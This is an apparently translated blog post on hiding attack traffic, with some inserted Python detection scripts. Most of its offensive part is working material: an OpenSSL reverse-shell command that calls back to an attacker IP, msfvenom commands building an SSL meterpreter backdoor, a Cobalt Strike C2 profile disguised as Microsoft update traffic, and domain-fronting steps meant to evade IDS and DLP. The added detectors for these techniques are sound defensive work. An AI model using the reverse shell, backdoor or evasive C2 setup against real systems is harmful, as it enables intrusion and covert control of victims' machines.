
MSF CS OpenSSL traffic encryption

2022-06-11 11:20:00 bwt_ D

OpenSSL encrypted reverse shell

OpenSSL is an open source software library. Applications use it for secure communication, preventing eavesdropping while confirming the identity of the peer at the other end of the connection. It is widely used by web servers on the Internet.

On kali, use OpenSSL to generate a self-signed certificate

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes


On kali, listen on a port

openssl s_server -quiet -key key.pem -cert cert.pem -port 8080

On the target, run the reverse shell command

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.10.10.129:8080 > /tmp/s; rm /tmp/s
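As an added detection example (not part of the original post), the following Python scans process-execution records for the combination of signals present in the command above: a FIFO joining stdin and stdout, an interactive shell, and openssl s_client as the transport. The record format and the sample lines are constructed.

```python
import re

# Constructed process-execution records "pid user cmdline" (made up, not from a real host).
SAMPLE_EVENTS = [
    "1201 www-data mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.10.10.129:8080 > /tmp/s; rm /tmp/s",
    "1202 deploy openssl s_client -connect example.com:443 -showcerts",
    "1203 root openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes",
    "1204 www-data /bin/sh -c cat /var/www/html/index.html",
]

# Three weak signals that are strong together: a FIFO joining stdin and stdout,
# an interactive shell, and openssl s_client used as the network transport.
FIFO_RE = re.compile(r"\bmkfifo\s+([^\s;]+)")
SHELL_RE = re.compile(r"/bin/(?:ba)?sh\s+-i\b")
SCLIENT_RE = re.compile(r"\bopenssl\s+s_client\b.*?-connect\s+([^\s;]+)")


def score_cmdline(cmdline: str) -> dict:
    """Return the indicators found in one command line and a score of 0..3."""
    hits = {}
    m = FIFO_RE.search(cmdline)
    if m:
        hits["fifo"] = m.group(1)
    if SHELL_RE.search(cmdline):
        hits["interactive_shell"] = True
    m = SCLIENT_RE.search(cmdline)
    if m:
        hits["tls_peer"] = m.group(1)
    return {"score": len(hits), "indicators": hits}


def find_tls_reverse_shells(events, threshold: int = 3) -> list:
    """Return (pid, user, peer) for every record whose score reaches the threshold."""
    alerts = []
    for line in events:
        pid, user, cmdline = line.split(" ", 2)
        result = score_cmdline(cmdline)
        if result["score"] >= threshold:
            alerts.append((pid, user, result["indicators"].get("tls_peer")))
    return alerts


if __name__ == "__main__":
    for pid, user, peer in find_tls_reverse_shells(SAMPLE_EVENTS):
        print(f"ALERT pid={pid} user={user} tls_peer={peer}")
```

A lower threshold turns the function into a triage list: a lone openssl s_client with -connect (record 1202) is ordinary administration and scores 1.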

msf traffic encryption to evade detection

Create an SSL/TLS certificate with OpenSSL

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \
-keyout www.google.com.key \
-out www.google.com.crt && \
cat www.google.com.key www.google.com.crt>www.google.com.pem && \
rm -f www.google.com.key www.google.com.crt


Create a back door

msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.11.132 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o pentestlab.bat


Copy the generated file to the target machine

Start the listener in msf


From the moment the payload executes on the target host, an encrypted meterpreter session opens; the host intrusion prevention system cannot inspect the packets and drop the connection.


The captured packets are encrypted.

Cobalt Strike: generate a certificate and modify the C2 profile to encrypt and obfuscate traffic

Generate a free SSL certificate

By default CS runs with the cobaltstrike.store certificate. The point of generating a new certificate is to use our own certificate instead, because the default certificate will be detected. The command to generate the certificate follows.


keytool -genkey -alias moonsec -keyalg RSA -validity 36500 -keystore moonsec.store

Remember the two strings moonsec (the alias) and moonsec.store (the keystore): they are needed when modifying the profile. The regional information you fill in is also used in the profile, so fill it in rather than leaving it blank, then save.

After running the command you are prompted for a password; enter moonsec123 (the same password goes into the profile's code-signer block). You are then prompted for the regional information; follow the prompts and fill it in step by step.


Create and modify the c2-profile file

set sample_name "xbb POS Malware";
set sleeptime "5000";   # 5000 ms (about 5 s) between callbacks
set jitter "10";        # add 10% jitter to the sleep time
set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0";

# subject of the self-signed certificate the team server presents
https-certificate {
    set CN "US";
    set O "MicrosoftUpdates";
    set C "en";
    set L "US";
    set OU "MicrosoftUpdates";
    set ST "US";
    set validity "365";
}

# code-signing keystore: keystore, password and alias must match the keytool command above
code-signer {
    set keystore "moonsec.store";
    set password "moonsec123";
    set alias "moonsec";
}

# IP address the DNS beacon resolves to when there are no tasks
set dns_idle "8.8.4.4";
# forced sleep (ms) before each individual DNS request
set dns_sleep "0";
# maximum hostname length when uploading data over DNS [0-255]
set maxdns "235";

http-post {
    set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php";
    client {
        header "Accept" "text/plain";
        header "Accept-Language" "en-us";
        header "Accept-Encoding" "text/plain";
        header "Content-Type" "application/x-www-form-urlencoded";
        id {
            netbios;
            parameter "id";
        }
        output {
            base64;
            prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data=";
            print;
        }
    }
    server {
        output {
            print;
        }
    }
}

http-get {
    set uri "/updates";
    client {
        metadata {
            netbiosu;
            prepend "user=";
            header "Cookie";
        }
    }
    server {
        header "Content-Type" "text/plain";
        output {
            base64;
            print;
        }
    }
}
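Added example, not from the original post or from Cobalt Strike: a small Python parser that pulls the network-observable values out of a profile in this format (user agent, URIs, literal headers, certificate subject), which is what a defender turns into signatures. The embedded profile excerpt is constructed from the profile above and abridged.

```python
import re

# Constructed, abridged excerpt of the profile above (only statements that carry
# network-observable values; a few data transforms are kept to show they are skipped).
SAMPLE_PROFILE = '''
set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0";
https-certificate { set CN "US"; set O "MicrosoftUpdates"; set C "en"; }
http-post {
    set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php";
    client { header "Accept" "text/plain"; header "Accept-Encoding" "text/plain"; }
}
http-get {
    set uri "/updates";
    client { metadata { netbiosu; prepend "user="; header "Cookie"; } }  # one-arg header = transform
    server { header "Content-Type" "text/plain"; }
}
'''

# Quote-aware tokenizer: quoted string | brace or semicolon | comment | bare word.
TOKEN_RE = re.compile(r'"([^"]*)"|([{};])|#[^\n]*|([^\s{};"#]+)')


def extract_indicators(text: str) -> dict:
    """Walk the profile statement by statement, tracking the enclosing block names,
    and collect what a sensor can match on: user agent, URIs, literal headers, cert subject."""
    ind = {"useragent": None, "uris": {}, "headers": [], "cert": {}}
    stack, stmt = [], []       # enclosing block names; tokens of the statement being built
    for m in TOKEN_RE.finditer(text):
        string, punct, word = m.groups()
        if punct is None:                      # string, word, or comment (no groups set)
            if string is not None or word is not None:
                stmt.append(string if string is not None else word)
            continue
        if punct == "{":
            stack.append(stmt[-1] if stmt else "?")
        elif punct == "}":
            stack.pop()
        elif stmt:                             # ";" ends a statement
            section = stack[0] if stack else "global"
            if stmt[0] == "set" and len(stmt) == 3:
                if section == "global" and stmt[1] == "useragent":
                    ind["useragent"] = stmt[2]
                elif section in ("http-get", "http-post") and stmt[1] == "uri":
                    ind["uris"][section] = stmt[2].split()   # one 'set uri' may list several URIs
                elif section == "https-certificate":
                    ind["cert"][stmt[1]] = stmt[2]
            elif stmt[0] == "header" and len(stmt) == 3:     # two-arg header is a literal header
                side = stack[1] if len(stack) > 1 else "?"
                ind["headers"].append((section, side, stmt[1], stmt[2]))
        stmt = []
    return ind
```

The certificate fields are worth keeping: a self-signed certificate whose subject is this exact set of values is itself a usable fingerprint for a public profile.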

Test certificate


Run the teamserver

nohup ./teamserver 192.168.11.132 admin moonsec.profile &

Domain fronting: Cobalt Strike evading IDS inspection

Domain fronting is an HTTPS-based evasion technique, also known as a domain-fronting network attack technique. It hides the traffic to Metasploit, Cobalt Strike and other team-server C2 infrastructure, so as to bypass inspection by censors or firewalls to a certain extent. Large providers such as Amazon, Google and Akamai offer services that can be used for domain fronting.

How domain fronting works: traffic is forwarded through CDN nodes to the real C2 server. The CDN node IP forwards the traffic according to the Host header of the request, and because the domain name we configure is highly trusted (for example, a Microsoft subdomain), this can effectively evade DLP, proxies and similar controls.
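Added example (not from the original post): the standard check for the technique just described, comparing the TLS SNI with the HTTP Host header on a TLS-inspecting proxy, since fronting relies on the two naming different domains. The flow records are constructed, and the registrable-domain helper is a deliberate simplification.

```python
# Constructed records from a TLS-inspecting proxy: SNI from the ClientHello,
# Host from the decrypted HTTP request. Made-up values, not real telemetry.
SAMPLE_FLOWS = [
    {"src": "10.0.0.5", "sni": "cdn.fronted-example.net", "host": "beacon.c2-example.net"},
    {"src": "10.0.0.6", "sni": "www.example.com", "host": "WWW.EXAMPLE.COM:443"},
    {"src": "10.0.0.7", "sni": "static.example.com", "host": "api.example.com."},
    {"src": "10.0.0.8", "sni": None, "host": "updates.example.org"},
]


def normalise(name):
    """Lower-case, drop a trailing dot and a :port suffix (IPv6 literals, with
    several colons, are left alone). Returns None for a missing value."""
    if not name:
        return None
    name = name.lower().rstrip(".")
    return name.rsplit(":", 1)[0] if name.count(":") == 1 else name


def registrable(name):
    """Crude eTLD+1 (last two labels). Enough for the sample; real deployments
    should use the Public Suffix List so that co.uk-style names compare correctly."""
    return ".".join(name.split(".")[-2:])


def classify(flow):
    """Label one flow by how the TLS SNI and the HTTP Host relate."""
    sni, host = normalise(flow.get("sni")), normalise(flow.get("host"))
    if sni is None or host is None:
        return "incomplete"            # nothing to compare; baseline these separately
    if sni == host:
        return "match"
    if registrable(sni) == registrable(host):
        return "same_domain"           # different hostname under the same owner: usually benign
    return "fronting_candidate"        # Host names a different domain than the handshake claimed


def fronting_candidates(flows):
    """Return (src, sni, host) for every flow classified as a fronting candidate."""
    return [(f["src"], f["sni"], f["host"]) for f in flows if classify(f) == "fronting_candidate"]


if __name__ == "__main__":
    for src, sni, host in fronting_candidates(SAMPLE_FLOWS):
        print(f"SNI/Host mismatch from {src}: sni={sni} host={host}")
```

Without TLS interception the Host header is not visible, so this check only works at a point where the proxy terminates TLS; otherwise the SNI alone has to be compared against destination reputation.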

Cobalt Strike domain fronting configuration

Modify the C2 profile: choose a suitable profile from https://github.com/xx0hcd/Malleable-C2-Profiles and change the Host header to the domain name prepared for us.

On kali, run the teamserver with the configuration file

nohup ./teamserver 192.168.11.132 admin cdn.profile

nohup is placed in front of the command so that it keeps running after the terminal hangs up; otherwise, once the shell is broken, CS will no longer connect.

Copyright notice
This article was written by bwt_ D; please include a link to the original when reposting. Thank you.
https://yzsam.com/2022/162/202206111103479764.html